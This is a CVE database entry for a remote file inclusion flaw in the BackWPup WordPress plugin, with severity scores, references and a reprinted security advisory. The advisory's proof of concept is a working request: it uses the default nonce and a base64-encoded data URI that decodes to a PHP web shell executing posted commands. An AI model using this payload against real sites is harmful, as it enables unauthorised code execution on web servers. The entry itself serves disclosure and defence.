CVE-2011-4342 : Detail

CVE-2011-4342

Code Injection
A03-Injection
9.47%V3
Network
2012-10-08
18h00 +00:00
2024-09-17
03h37 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP remote file inclusion vulnerability in wp_xml_export.php in the BackWPup plugin before 1.7.2 for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the wpabs parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 17056

Publication date : 2011-03-27 22h00 +00:00
Author : Sense of Security
EDB Verified : No

Sense of Security - Security Advisory - SOS-11-003 Release Date. 28-Mar-2011 Last Update. - Vendor Notification Date. 25-Mar-2010 Product. Wordpress Plugin BackWPup Platform. Independent Affected versions. 1.6.1 (verified), possibly others Severity Rating. High Impact. System Access Attack Vector. Remote without authentication Solution Status. Upgrade to version 1.7.1 CVE reference. Not yet assigned Details. A vulnerability has been discovered in the Wordpress plugin BackWPup 1.6.1 which can be exploited to execute local or remote code on the web server. The Input passed to the component "wp_xml_export.php" via the "wpabs" variable allows the inclusion and execution of local or remote PHP files as long as a "_nonce" value is known. The "_nonce" value relies on a static constant which is not defined in the script meaning that it defaults to the value "822728c8d9". Proof of Concept. wp_xml_export.php?_nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0 ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d Solution. Upgrade to version 1.7.1 Discovered by. Phil Taylor - Sense of Security Labs. Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: [email protected] Twitter: @ITsecurityAU The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

Products Mentioned

Configuraton 0

Backwpup>>Backwpup >> Version To (including) 1.7.1

    Wordpress>>Wordpress >> Version -

    References

    http://www.osvdb.org/71481
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.exploit-db.com/exploits/17056
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://seclists.org/fulldisclosure/2011/Mar/328
    Tags : mailing-list, x_refsource_FULLDISC
    http://secunia.com/advisories/43565
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.openwall.com/lists/oss-security/2011/11/22/10
    Tags : mailing-list, x_refsource_MLIST
    http://www.openwall.com/lists/oss-security/2011/11/22/7
    Tags : mailing-list, x_refsource_MLIST